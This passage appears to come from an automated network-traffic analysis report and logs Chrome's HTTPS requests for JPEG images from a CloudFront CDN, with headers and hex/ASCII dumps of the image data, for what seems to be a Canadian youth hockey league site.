                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2025-01-13 21:01:20 UTC487INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/jpeg
                                                                                                                          Content-Length: 64973
                                                                                                                          Connection: close
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:21 GMT
                                                                                                                          Last-Modified: Tue, 17 Dec 2024 19:59:54 GMT
                                                                                                                          ETag: "7b82e84f2721a84e65723ef64dc19abe"
                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Server: AmazonS3
                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                          Via: 1.1 966a4e45512437c14125c564c492a2d6.cloudfront.net (CloudFront)
                                                                                                                          X-Amz-Cf-Pop: IAD50-C2
                                                                                                                          X-Amz-Cf-Id: O2Ndh_MJfijwfiit8wa3ZOp-B9RZx54zRJ0s5qLwXxCaJ-I--gdaHw==
                                                                                                                          2025-01-13 21:01:20 UTC14588INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff e1 08 a8 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 0b 01 0f 00 02 00 00 00 06 00 00 00 92 01 10 00 02 00 00 00 1b 00 00 00 98 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 b4 01 1b 00 05 00 00 00 01 00 00 00 bc 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 07 00 00 00 c4 01 32 00 02 00 00 00 14 00 00 00 cc 01 3c 00 02 00 00 00 1b 00 00 00 e0 02 13 00 03 00 00 00 01 00 01 00 00 87 69 00 04 00 00 00 01 00 00 00 fc 00 00 00 00 41 70 70 6c 65 00 69 50 68 6f 6e 65 20 53 45 20 28 32 6e 64 20 67 65 6e 65 72 61 74 69 6f 6e 29 00 00 00 00 00 48 00 00 00 01 00 00 00 48 00 00 00 01 31 35 2e 36 2e 31 00 00 32 30 32 32 3a 31 31 3a 31 33 20 31 34 3a 34 35 3a 33 31 00 69
                                                                                                                          Data Ascii: JFIFHHExifMM*(12<iAppleiPhone SE (2nd generation)HH15.6.12022:11:13 14:45:31i
                                                                                                                          2025-01-13 21:01:20 UTC2403INData Raw: b2 b6 96 ee e7 f6 50 42 a5 9d d8 8c 01 54 ee 31 d4 ae 61 b7 4b 3b 19 1f be 98 f2 11 12 f3 31 cf 80 19 eb 54 ae d0 f5 bd 43 4c e0 3b 8d 3d a0 bb 92 26 50 d7 26 68 96 d9 a1 81 59 72 aa 37 e6 66 3d 3e 66 b9 c6 49 ca 91 dd e2 71 8a 93 f7 29 9d a7 f6 a0 fc 51 79 34 60 b2 40 ed cb 6f cd 9e 58 a3 ce 3e a9 5f ac 7a 93 9f 1a a7 49 c4 37 56 31 48 91 6a 8d f1 aa a4 41 64 61 94 03 70 0e 76 5c f8 74 c8 a8 8b bb c4 4b 8c 58 c5 7d 15 a4 91 f3 2a de b0 62 c7 27 25 48 db 1d 2a 43 87 b4 2d 0a ef 85 75 dd 4f 52 d7 6d ec 2f ec d3 16 76 6c 17 33 1e a3 00 9c 9c 9d b6 1b 63 7a f4 24 8e 2d b2 6b 86 78 c1 b8 7e fb 4c d6 74 bd 5e 34 ba 1c c2 68 e7 c2 e7 cd 18 02 72 a7 3b 31 c1 f1 c0 c5 7a cb 47 e2 18 35 8d 2a d3 51 8d 5c 25 cc 4b 20 18 ce 32 3a 57 8d e5 b1 d0 9f 87 cd cb 4b 08 bf
                                                                                                                          Data Ascii: PBT1aK;1TCL;=&P&hYr7f=>fIq)Qy4`@oX>_zI7V1HjAdapv\tKX}*b'%H*C-uORm/vl3cz$-kx~Lt^4hr;1zG5*Q\%K 2:WK
                                                                                                                          2025-01-13 21:01:20 UTC16384INData Raw: 2a 43 63 a1 e8 05 73 93 be c7 48 7c ae ce e5 ac 76 c1 c2 1a c5 aa 41 0c 10 da 4c b2 2e 5a 35 6e 60 3a 11 8e 51 9f b6 aa 37 fc 77 a4 cb 3c 9f 46 ba 99 e2 52 c3 91 a3 c1 71 e1 e3 b7 b6 f5 cd 78 a7 87 38 83 86 a6 8d 35 78 45 bf 7b bc 6e cb cc af ec e3 63 55 b9 27 91 9f e3 61 30 ce fc ad ca 7e 54 51 75 c1 f4 f1 fc 4e 58 d6 da 3b 87 eb 28 a5 bd 58 d6 59 54 c2 a2 44 81 5b 95 5c 38 c6 5b cc 0d fe da 99 e2 ad 62 1b fd 5a df 87 ae 95 2d c5 c5 9c 51 5c c8 ad dd 0e f0 21 28 ce d9 00 9e 9b 1d b7 ae 3d c2 1c 57 36 97 76 bd dc ee e8 0f c5 6f 28 19 23 d0 e2 ba ee 87 a7 e9 5c 63 ac e9 b7 77 16 e9 37 7c 55 27 fa 3a 95 91 c8 df 99 f1 fb de 67 c7 15 9c 79 ba 53 b9 23 19 f3 3d 52 b7 ec 52 34 4e 14 7d 53 56 9f 4e 99 d2 33 6e 18 b4 dc c7 95 b0 71 b1 00 e4 6f d6 ac fc 17 a5 c3
                                                                                                                          Data Ascii: *CcsH|vAL.Z5n`:Q7w<FRqx85xE{ncU'a0~TQuNX;(XYTD[\8[bZ-Q\!(=W6vo(#\cw7|U':gyS#=RR4N}SVN3nqo
                                                                                                                          2025-01-13 21:01:20 UTC1024INData Raw: 88 2c 69 95 2a a0 37 31 24 92 de 43 a1 a8 1e c4 bb 31 83 b5 0d 7d b4 db cb c9 ac ed 97 e3 79 22 50 58 e0 12 40 cf 8f f5 af 69 f0 2f 00 70 ef 67 7a 50 d3 b4 1d 39 21 56 03 bd 99 fe 29 67 23 c5 db c7 c7 6e 83 c2 ae 59 ae c8 e3 14 4d 7d 1a 3f e0 19 a4 34 01 58 8f ce 9e 33 a6 3f b2 df de 87 df 2f 8c 19 f9 d7 9c e8 35 ee 37 dc ed e8 6b 98 76 9d 69 f4 ce d1 78 22 db 04 ac 72 34 ed e8 04 88 07 df 5d 63 bd 03 a4 2b 5c df 8c 2e e0 7e d6 b8 6e de 5c 23 bd a6 62 5f e2 22 60 c4 7d 8b 51 ab e0 dc 67 b5 da 3a 19 88 78 64 6f d2 bc 33 db 55 c4 d2 76 ad af ce 8d 1a 3a dc c8 83 9c e0 63 1c bf 85 7b b4 c8 3a 88 87 da 6b c5 ff 00 a4 af 06 47 c3 5c 75 25 da 5d b5 c2 ea ca d7 9c ac 30 d1 12 c4 15 27 c7 71 b5 7a 34 ed 29 72 71 9d d1 c5 e6 21 a0 55 e6 19 52 76 c5 00 2f 9d 12 43
                                                                                                                          Data Ascii: ,i*71$C1}y"PX@i/pgzP9!V)g#nYM}?4X3?/57kvix"r4]c+\.~n\#b_"`}Qg:xdo3Uv:c{:kG\u%]0'qz4)rq!URv/C
                                                                                                                          2025-01-13 21:01:20 UTC16384INData Raw: 5a dd fa 61 8f ef 28 39 1b ee 3d 6b ab d8 de da ea 56 b1 de 59 5c 43 75 6d 28 ca 4d 0b 87 46 1e 84 51 35 6e 1a b0 d7 ad 0d a6 a9 63 6f 77 09 e8 92 a0 6c 7b 79 7c ab 98 de 76 2b ae 70 a5 e4 ba a7 67 1a eb e9 ac c7 9d f4 db 8f 8a da 53 9d c1 5e 9d 3c 76 3e b5 8a 29 d4 40 df d2 b4 d9 de b9 a6 8d db 44 76 37 c9 a3 71 de 91 3f 0e 6a 59 e5 33 30 2d 6d 27 f7 83 75 50 7d 72 3d 6b a8 db 24 17 b0 c7 71 04 f0 cf 0c 83 99 5e 37 e6 56 1e 60 8e b5 28 1e 7e e3 5f d2 46 e7 82 fb 4d ba d0 a7 d3 61 b8 d1 ad 1d 22 95 93 3d f0 25 41 66 07 38 db 3d 31 f3 ae e7 6d 71 1d ed ac 57 30 30 78 66 45 92 36 1d 19 48 c8 3f 65 78 6b b6 08 fe 9f da 9f 11 88 f2 59 f5 19 10 6d d4 f3 72 d7 b7 f4 0d 2c e9 7a 26 9f 62 56 56 6b 7b 58 a2 24 2f 8a a8 15 a9 2e 08 98 5b 90 cb 0b e0 e0 f2 9d ea 9c
                                                                                                                          Data Ascii: Za(9=kVY\Cum(MFQ5ncowl{y|v+pgS^<v>)@Dv7q?jY30-m'uP}r=k$q^7V`(~_FMa"=%Af8=1mqW00xfE6H?exkYmr,z&bVVk{X$/.[
                                                                                                                          2025-01-13 21:01:20 UTC1024INData Raw: 66 6f 7f f9 56 0d 42 39 7e b0 e5 27 c8 d5 48 83 c9 6e e3 88 91 89 73 ee 28 07 59 58 76 31 8d fc 58 e6 84 4a 4d b2 f2 1f 56 38 34 83 61 cb 92 d0 02 0f f0 9a a2 c6 7a ff 00 11 2c 56 12 f2 e9 91 de 96 f8 7b 92 a0 ab 7b 83 e1 5c f2 d7 57 e2 6b 2b 35 d3 f4 dd 2e d2 c5 54 10 f3 c5 02 ab be f9 dc d7 45 9a 14 03 0b 0a 0f 9d 07 e8 ec 37 ee d7 1f 69 a1 2c a2 69 93 df e9 48 b2 5e 2a c8 ca 09 41 32 f3 05 f6 15 09 fa 83 85 e1 bb 92 f2 5d 0a c1 de 56 2e c8 58 9f 88 9c 93 8c fd d5 d7 17 48 8e 64 e6 93 b9 c3 1c 10 46 f4 58 b4 3b 58 17 9a 08 ed d4 7f 71 40 a5 82 89 73 c5 77 7a 9a 2c 22 c5 b0 a4 15 22 11 91 8e 9b 9a 93 b0 bd d4 ee 2e 12 e2 ec c9 88 c9 28 9d 15 49 1e 40 55 c9 2c 63 44 0a 3b b0 49 ce 39 40 cd 11 a1 48 10 b1 b6 89 8e 36 c8 a5 82 1d 2f ae dc 8c 19 14 7a 51 4d
                                                                                                                          Data Ascii: foVB9~'Hns(YXv1XJMV84az,V{{\Wk+5.TE7i,iH^*A2]V.XHdFX;Xq@swz,"".(I@U,cD;I9@H6/zQM
                                                                                                                          2025-01-13 21:01:20 UTC1730INData Raw: 8c b1 ed 85 da ff 00 d2 56 69 e2 41 86 2e 0f b7 4a 6f 25 ec 45 f2 b2 31 3e 80 d1 64 12 4d f0 c8 08 5f 53 42 ee 22 07 00 62 a1 c4 71 1d e1 23 97 9d f7 f1 cd 1a 2c 4b fb d9 f4 34 d6 28 54 1c 2a 9d e9 dc 50 9c e3 1b f9 8c 8a 01 f5 b0 99 7e a1 54 fb 29 dc 66 ef 38 42 48 3d 46 36 34 c9 23 97 6e 49 18 1f 53 52 36 cf 70 bf 5e 54 1f 79 a1 43 a4 33 44 39 99 59 1b c1 54 e6 8f 0c 92 16 06 50 59 7f 97 04 7c a8 5f 4e 68 b6 33 e4 78 6d 4b 7d 54 84 25 65 0b eb 80 68 0e 47 fa 41 f1 46 bf a1 cb a7 5b e8 d3 cd 67 65 34 2e d3 cd 12 f2 f7 87 3f 57 23 71 b7 af 8d 79 d2 f3 51 37 93 b5 d5 ec 4d 79 70 0f ec da 69 d8 84 1e 39 1d 4f db 5e b6 e3 8b f3 77 04 42 e2 1f a4 da 80 43 91 08 7e 43 e6 57 c4 55 2a d7 86 b8 32 fa ee 39 ee 34 9b 29 63 c9 0e 61 5e 53 9c 6c 48 04 6d 45 2a ee 46
                                                                                                                          Data Ascii: ViA.Jo%E1>dM_SB"bq#,K4(T*P~T)f8BH=F64#nISR6p^TyC3D9YTPY|_Nh3xmK}T%ehGAF[ge4.?W#qyQ7Mypi9O^wBC~CWU*294)ca^SlHmE*F
                                                                                                                          2025-01-13 21:01:20 UTC11436INData Raw: a7 7f 85 39 1d e9 56 c7 b1 22 bb 1f d1 15 21 31 b3 2f 98 e6 19 c5 30 9e c6 17 f8 71 6a 4f 9e 08 3f 8d 42 ee 39 4c 7c 2f aa c6 5c 0b c5 94 3f d6 e7 45 f8 be cc 51 21 d2 75 fb 67 91 e0 4d 3d 5e 56 0c f2 61 db 24 0c 67 19 eb 81 5d 12 4d 2a 32 e1 40 84 91 e4 c7 7a 6a da 69 4c f2 c4 a3 d9 8d 0d 26 73 b9 f8 77 59 b9 c4 93 df ff 00 8c 16 cb 30 8c 63 1e 40 78 55 9b 4a e4 82 28 e2 9e e2 62 c8 a1 49 64 eb f3 a9 27 87 ba 73 fb 02 7d 43 1a 48 8a 32 ff 00 d8 38 f7 6a 58 1d 29 b4 70 a4 4e 07 9a 9f 1a 22 43 13 92 03 2e 47 81 41 bd 32 61 08 1f 10 23 1d 31 83 4b 8a f3 bb 3f 0f 39 f4 da ad 92 89 18 23 01 bf b2 8f 03 cc 1d e9 e4 48 5c 6d 14 63 e7 4d 6d b5 b7 45 0a d0 c6 c7 d6 9d ae b9 06 3e 2b 70 1b d2 96 4a 14 cb 27 84 48 07 a1 a1 f2 b2 b8 25 01 1d 69 c2 6a 56 52 8c 32 10
                                                                                                                          Data Ascii: 9V"!1/0qjO?B9L|/\?EQ!ugM=^Va$g]M*2@zjiL&swY0c@xUJ(bId's}CH28jX)pN"C.GA2a#1K?9#H\mcMmE>+pJ'H%ijVR2


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          106192.168.11.204993154.239.153.764431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:19 UTC439OUTGET /app/uploads/gthl/2024/12/09110126/Broidy-Rondelet-Beyond-the-Whistle-730x411.jpg HTTP/1.1
                                                                                                                          Host: d2pr6pnwfmh0za.cloudfront.net
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2025-01-13 21:01:20 UTC487INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/jpeg
                                                                                                                          Content-Length: 73709
                                                                                                                          Connection: close
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:21 GMT
                                                                                                                          Last-Modified: Mon, 09 Dec 2024 16:01:28 GMT
                                                                                                                          ETag: "1fcaf6cb7f3245b889c037ffd95317f0"
                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Server: AmazonS3
                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                          Via: 1.1 07b0e28d0c589c8a26610bbc5dcd660a.cloudfront.net (CloudFront)
                                                                                                                          X-Amz-Cf-Pop: IAD50-C2
                                                                                                                          X-Amz-Cf-Id: SGifhoxzsiwuRjigWGnfWvGyw-fjL52bq14Tdd_vsLMm-BDQRRwx7Q==
                                                                                                                          2025-01-13 21:01:20 UTC15897INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 02 00 26 00 26 00 00 ff db 00 43 00 03 02 02 02 02 02 03 02 02 02 03 03 03 03 04 06 04 04 04 04 04 08 06 06 05 06 09 08 0a 0a 09 08 09 09 0a 0c 0f 0c 0a 0b 0e 0b 09 09 0d 11 0d 0e 0f 10 10 11 10 0a 0c 12 13 12 10 13 0f 10 10 10 ff db 00 43 01 03 03 03 04 03 04 08 04 04 08 10 0b 09 0b 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 ff c0 00 11 08 01 9b 02 da 03 01 22 00 02 11 01 03 11 01 ff c4 00 1e 00 00 00 06 03 01 01 00 00 00 00 00 00 00 00 00 00 00 03 06 07 08 09 02 04 05 01 0a ff c4 00 4f 10 00 01 02 05 03 02 04 03 05 05 05 06 03 05 08 03 01 02 03 00 04 05 06 11 07 12 21 08 31 13 41 51 61 09 22 71 14 32 81 91 a1
                                                                                                                          Data Ascii: JFIF&&CC"O!1AQa"q2
                                                                                                                          2025-01-13 21:01:20 UTC1094INData Raw: af b3 b5 fb c1 f7 13 e5 ed 11 76 c7 65 4a a9 b2 a0 9e 41 ef 12 2a 59 09 12 ed 02 39 d8 9f 3f 68 9e a5 53 42 86 a4 96 96 42 66 f6 a7 24 fa c6 b4 f9 07 ea 63 12 f9 2e 61 3c 63 da 09 9a 7f 71 c1 00 c7 1b 76 ce d4 e9 6e 6b ad b4 b9 85 1f bc 79 8e 84 98 4a 13 e4 4c 72 d0 ad cb c0 fc 23 ab 29 c0 c8 1f 9f 78 1b b7 42 dc ef d1 99 0e 29 39 48 fb de 7d e1 7f 47 71 0c ad b0 d0 1b bd 41 e6 11 16 f4 bb af 3c 10 01 03 23 3c 43 b9 6a 5a 5e 3a d0 e3 89 24 11 90 48 8e 2e a1 ee f5 1d 78 2a 4e 98 a7 b6 e7 56 cb 68 74 a0 ee 38 ec 33 0b ea 6c e0 3b 4a 80 c6 47 27 d7 d6 39 94 6b 65 b4 34 84 a9 b2 48 07 f0 85 0c bd 08 84 b4 11 b8 7c c0 73 fd 22 31 2b 5b 95 d5 47 42 d8 73 ec d0 d4 fd 39 4d 94 a5 4a 52 31 da 23 56 ad d1 1d a6 5d 4f 27 6e 10 e6 e3 db 82 73 de 25 4e 93 51 b2 e9 69
                                                                                                                          Data Ascii: veJA*Y9?hSBBf$c.a<cqvnkyJLr#)xB)9H}GqA<#<CjZ^:$H.x*NVht83l;JG'9ke4H|s"1+[GBs9MJR1#V]O'ns%NQi
                                                                                                                          2025-01-13 21:01:20 UTC12792INData Raw: bb 6e 9f 32 37 34 8d 84 e7 b7 68 4e d5 ed b5 c9 a3 c4 67 e6 e3 cf ce 16 ad f7 0d cd 7a 2d 15 55 a7 56 f3 8e 16 e4 98 50 f1 57 dc 9c f6 48 f7 89 39 a5 1a 0b 33 7e da 35 bb 92 4e b1 43 93 a5 5a d2 cd be ec b4 db c4 29 f5 a8 9d ac 25 29 f9 96 b2 01 24 f6 1e b1 1d 6c f9 93 26 f7 d9 ce 14 de e2 ee c5 8f 94 a8 0f 31 12 8b a6 e9 c9 2a d3 cd d3 5b 52 69 ec 3e da d8 9c 7c 27 c4 52 d2 a7 13 8c 03 db 9c 64 fa 66 26 4e 95 9a 42 1e 6c d4 7d c4 6d 5f 4c e8 94 c9 84 26 9f 5c f0 d4 b6 c2 97 e3 30 a4 25 b5 9e e8 04 9f 98 0f 58 4c 5e 56 5c f5 1e 8a ed c1 2d 3d 2b 52 96 92 98 43 53 25 93 9f 08 2f b1 52 4f 61 9e c6 24 5e ac b1 a4 14 fa 9b f6 bd 6b 51 6a 2c 3f 4f c2 94 83 4b 2b 08 27 9d dc 1e 44 37 f4 5b 1e df bc 26 6a f4 4d 39 bd 1b af 49 d6 a4 1d 96 9c 47 d9 4b 2a 65 d4 8d
                                                                                                                          Data Ascii: n274hNgz-UVPWH93~5NCZ)%)$l&1*[Ri>|'Rdf&NBl}m_L&\0%XL^V\-=+RCS%/ROa$^kQj,?OK+'D7[&jM9IGK*e
                                                                                                                          2025-01-13 21:01:20 UTC4616INData Raw: 24 92 4d 06 df 9d ae 4a 4a cc ce cc 24 2e 6a 65 a5 3c 94 ab 8e cd a4 82 7d f9 ef 03 92 5b 09 ed 17 22 c7 ae ab ae df b2 28 33 57 3d d7 56 97 a5 d2 a4 92 15 31 35 30 ad ad a0 13 81 93 f5 88 c7 5a ea 9e d8 d7 0b 91 7a 5d d3 88 97 b9 ee 47 1b 5b 8b 9a 9c dd 2f 4f 61 94 fd e5 95 91 b9 78 c8 e1 23 98 e9 fc 4b 67 9d 90 e9 2a e2 5b 45 cc 2e 72 49 2b d9 e6 9f 18 67 3e d1 04 7e 14 f7 04 92 fa 9e 6e 9e 96 9d 42 df a2 cf 63 27 82 40 41 ff 00 48 16 46 a4 d2 23 24 96 28 c5 ae ff 00 f2 48 cb d3 a3 db 7a 8c a1 7a 75 5f d4 64 95 26 5e 69 6a d9 29 4e 40 97 6d 44 72 50 85 39 95 28 8f 64 e6 1e dd 0d d2 be 9c 35 17 4b e6 28 5a 5f 75 dd 75 7b 6e 41 f5 c8 87 8d 6a 69 af 09 cc 05 2b c3 00 a4 01 f3 03 f7 71 cc 29 fa 9e e9 97 4e 7a 8e 55 ad 29 a8 97 54 e5 25 8a 34 d3 aa 96 66 59
                                                                                                                          Data Ascii: $MJJ$.je<}["(3W=V150Zz]G[/Oax#Kg*[E.rI+g>~nBc'@AHF#$(Hzzu_d&^ij)N@mDrP9(d5K(Z_uu{nAji+q)NzU)T%4fY
                                                                                                                          2025-01-13 21:01:20 UTC12792INData Raw: ce 24 36 a3 6b 3f 46 1d 56 5a 47 4c 6e 1d 60 95 66 56 6a 61 b9 84 25 33 0b 91 73 c5 4e 76 fc ce a7 69 ef d8 c0 ed c7 64 1a a2 9d b6 56 87 58 1a 8b a3 9a a3 aa 89 b8 b4 46 d6 66 85 41 fd 9e d3 4f 34 89 04 ca f8 b3 39 51 5a cb 69 e3 cc 0c f9 e2 18 a2 c8 07 2d ac 83 9f ce 2c 7a f8 f8 4e ca 54 24 dd ac 68 b6 ae 4a 54 db 58 dc cc bd 49 09 29 50 c7 60 fb 24 83 f5 29 11 02 b5 37 4d 6e 5d 2b be 2a 7a 7f 77 cb 35 2b 58 a5 3b e0 cc 25 b7 43 88 07 00 82 14 3b 82 08 30 45 ae 12 a1 f2 58 c7 c2 1d ea fc fd bd 7e 4c 54 2b 33 b3 12 12 8f 49 4a cb 4a ba fa 94 d3 4a 21 c5 2d 49 49 38 49 3f 2f 68 90 1d 47 75 1d a0 fa 7f 7a d3 34 a3 5b ad ff 00 b4 c8 56 24 84 d8 9f 5b 01 d6 e5 54 56 52 33 8f 9d 07 e5 ce e4 f2 21 af f8 4b db ae 53 34 0e bb 5d 75 49 51 ab 5c 2e 04 91 df 6b 4d
                                                                                                                          Data Ascii: $6k?FVZGLn`fVja%3sNvidVXFfAO49QZi-,zNT$hJTXI)P`$)7Mn]+*zw5+X;%C;0EX~LT+3IJJJ!-II8I?/hGuz4[V$[TVR3!KS4]uIQ\.kM
                                                                                                                          2025-01-13 21:01:20 UTC12742INData Raw: 93 74 74 bc fd 71 94 6e 7a d9 ab ca cf 03 8c e1 b5 92 d2 ff 00 f8 80 fe 10 ff 00 74 dd 76 7f 6e 34 0e c0 ba 8b 9b d7 3f 6f c9 a9 c5 67 bb 89 68 25 7f e6 49 8d 5e a8 ed 16 ef 9e 9e 35 06 da 71 1b 8c cd 06 69 c6 c7 fe f1 b4 17 10 7f c4 81 0e 6b 66 81 1f 3c 89 6d b1 30 95 a9 39 29 50 3d bd e3 e8 72 c0 a2 d2 ae bd 2a b4 ab d4 b4 25 28 9d a1 c8 be 80 0f 18 53 08 31 f3 d3 e1 25 4a 20 11 b8 12 0c 5f 3f 41 97 83 17 97 4a 36 04 db 6f f8 8f 53 a9 e6 97 31 cf 29 71 85 94 60 ff 00 74 24 fe 31 51 a8 ef 10 6a 99 1d 7e 29 34 09 a9 7e 99 1e 7f 61 c4 95 6a 49 67 8f 22 54 9f f5 8a 83 91 9d 2d ac 6e 18 11 78 bf 15 39 16 df e9 0e bc f8 47 cc 8a 8c 86 48 1e 5e 30 8a 2d 71 2a 6d 5e 9e 79 11 52 96 a7 62 a3 e8 a3 a3 1b da 9f 7f f4 c3 a7 b5 c9 07 12 af 06 8c cd 3d f0 3f 81 e9 71
                                                                                                                          Data Ascii: ttqnztvn4?ogh%I^5qikf<m09)P=r*%(S1%J _?AJ6oS1)q`t$1Qj~)4~ajIg"T-nx9GH^0-q*m^yRb=?q
                                                                                                                          2025-01-13 21:01:20 UTC2604INData Raw: ca d2 d2 e8 cf ef 0f fb d7 c9 f3 3c ed 1f 8c 39 3d 7f 75 2c 9d 31 b1 11 a7 76 64 de da dd d0 ca db 79 f4 ab 0a 96 94 ec b2 31 d9 4a e5 23 db 30 b1 d3 ea 24 a6 9e 59 14 4b 02 89 fb b9 7a 54 a2 1b 59 1d d6 e7 75 a8 fb 95 12 62 b7 fa bf bf 17 7c 6b a5 75 d4 3b be 5e 92 53 4c 63 1d b0 d0 c2 b1 fd e2 a8 7f 4c 69 11 8d 55 cd f2 34 72 8d 4c 54 27 5a 95 96 6d 6e bf 32 b4 b6 da 52 32 56 b5 1c 00 3d f3 17 99 d1 8e 8e 50 fa 77 d2 2a 75 20 49 34 8a ed 49 a4 4e 56 a6 8a 46 f7 1e 52 73 e1 e7 be d4 03 80 3e a7 ce 2a e3 a0 8d 2e 46 a2 eb a4 8d 56 a5 2e 97 69 76 bb 66 a6 f8 5a 7e 52 e8 38 69 3f e2 e7 fb b1 6f 32 73 8e ce 2f 19 29 65 07 1e c7 da 2a 1e e4 2f 54 b7 e1 0e 8c 8d 68 56 9c 4b b3 8b 5a 65 52 af 91 a0 71 bf dc fb 7b 41 b7 be a3 69 96 9d 5b 33 37 4d f1 5e 91 a2 d3
                                                                                                                          Data Ascii: <9=u,1vdy1J#0$YKzTYub|ku;^SLcLiU4rLT'Zmn2R2V=Pw*u I4INVFRs>*.FV.ivfZ~R8i?o2s/)e*/ThVKZeRq{Ai[37M^
                                                                                                                          2025-01-13 21:01:20 UTC9000INData Raw: f2 93 49 75 b0 e0 f3 88 4e b6 21 36 d5 9d 04 93 91 95 62 0e 4f 7f 58 d3 4b a0 1e fc c1 e8 70 9c 1c 43 68 a5 b1 b0 09 e4 c5 4f 75 f2 f2 ee 1e bb 2c 1b 6d c7 3e 59 3f b3 be 7c c2 46 fd df d1 11 6b c1 7c 71 15 07 d5 9d 6d b9 8f 88 fc aa e6 0f c9 2a 99 69 74 67 cb f7 2a ff 00 53 19 b5 b6 e6 d1 ff 00 6a 6f ed fd d0 f1 55 ea 8a 90 66 a6 f3 08 f1 66 5a 65 d7 1a c2 be fa c2 49 03 f3 c4 54 85 7a 72 66 a3 59 9e 9f 9d 2a fb 4c c4 cb 8e bb 93 ce f5 28 93 fa c5 ba cd cb b1 30 14 eb 68 1b 56 9d d1 57 1a e7 6b 22 d0 d5 5b 8e 8a d3 64 36 27 16 f3 20 79 36 bf 99 3f d6 00 fd cd 89 c9 f0 e4 b3 91 45 d3 4a 8d da 52 0c d5 c3 3f e1 a0 e7 90 d3 43 68 ff 00 31 51 85 f7 56 dd 61 d3 74 32 92 ab 1a c7 79 a9 bb c2 69 bf 99 5c 29 12 20 8f bc af 55 fa 08 67 ad dd 6a a2 74 d7 d3 3d b2
                                                                                                                          Data Ascii: IuN!6bOXKpChOu,m>Y?|Fk|qm*itg*SjoUffZeITzrfY*L(0hVWk"[d6' y6?EJR?Ch1QVat2yi\) Ugjt=
                                                                                                                          2025-01-13 21:01:20 UTC2172INData Raw: 82 9a 74 60 85 0e fe f1 cd 61 d2 50 15 9e de 71 b8 cb a9 e5 24 1c a8 43 76 de e0 2b 34 4a d7 b0 68 3a 83 4f ac 5f 05 e5 c8 ca 4c b6 f3 48 dd fb b5 29 2a c8 0b f6 c8 8b 87 e9 35 9d 25 91 ba 2b 53 3a 69 2d 4f 92 7e e4 60 55 aa 12 b2 a4 7c aa 27 68 50 48 fb a9 24 13 81 c6 49 8a 5e a6 ce 95 7e e1 de 54 46 01 27 bc 49 4f 87 bd f5 33 a7 1d 54 5b c7 ed 4e 9a 7d d0 95 d1 27 19 52 89 09 2b 1f ba 23 d8 2c 0f ce 26 69 7d 45 2c ad fa 17 05 d8 c0 81 02 20 40 81 02 04 00 08 10 20 40 00 81 02 04 00 08 10 20 40 00 81 02 04 00 08 10 23 c8 00 f6 3c 38 81 9c 46 25 46 01 36 0f 28 c4 9f 28 04 fb 73 1e 13 0d 21 59 e6 ee 79 82 d4 a3 98 cb 23 be 23 1c e7 19 f3 8b 44 f2 6b bc b5 60 f1 98 e6 cd 3c e2 41 c6 63 aa e2 47 23 38 8d 37 a5 c2 b2 44 52 a1 58 9a 99 98 9a 52 8e dc fd 63 41
                                                                                                                          Data Ascii: t`aPq$Cv+4Jh:O_LH)*5%+S:i-O~`U|'hPH$I^~TF'IO3T[N}'R+#,&i}E, @ @ @#<8F%F6((s!Yy##Dk`<AcG#87DRXRcA


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          107192.168.11.204993054.239.153.1384431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:19 UTC680OUTGET /app/uploads/gthl/2022/10/31124110/SnacksToFuelPerformance-BreakoutFall2022-730x355.jpg HTTP/1.1
                                                                                                                          Host: d2pr6pnwfmh0za.cloudfront.net
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                          Referer: https://gthlcanada.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2025-01-13 21:01:20 UTC449INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/jpeg
